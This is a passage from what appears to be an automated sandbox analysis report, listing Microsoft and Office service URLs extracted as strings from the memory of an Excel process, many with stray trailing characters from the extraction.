Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeK.?;-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeNjT;/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeU.Q;/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeV-P:
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorized
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeg)
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeh/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizei.
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeizez
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizej-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizelj:;-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizem
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizemi;:
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizent
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizep)2
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizet
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizet-
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizey/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizez.
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize~
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize~i$:?
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://management.azure.com
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://management.azure.com/7
Source: EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech=9
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, 00000000.00000003.413455560.000000000F457000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.607735341.000000000F457000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.608824531.0000000012F39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.513076581.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413539859.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.456932989.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472613834.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471316055.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.413742220.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472235778.0000000012F33000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.474334086.0000000012F33000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeap
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000000.00000002.608462358.0000000012D34000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.comK
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com#VS:
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com%WY;G
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com/WW;F
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com3WC;H
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com7VO:b
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com9VE:a
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comCW
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comL/
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comP6
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comQj
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comUi
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comWW
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comYW
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comaW
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comgi
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comkWk;L
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comqh
Source: EXCEL.EXE, 00000000.00000002.608273197.0000000012CA4000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comuW
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp, 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE:
Source: 3AC5173B-BE2E-4080-B9F2-503317BAB84A.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EXCEL.EXE, 00000000.00000003.513565670.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.608543392.0000000012D90000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.471041107.0000000012D8F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472744264.0000000012D8F000.00000004.00000001.sdmp String found in binary or memory: https://officesetup.getmicrosoftkey.comQ%g;D
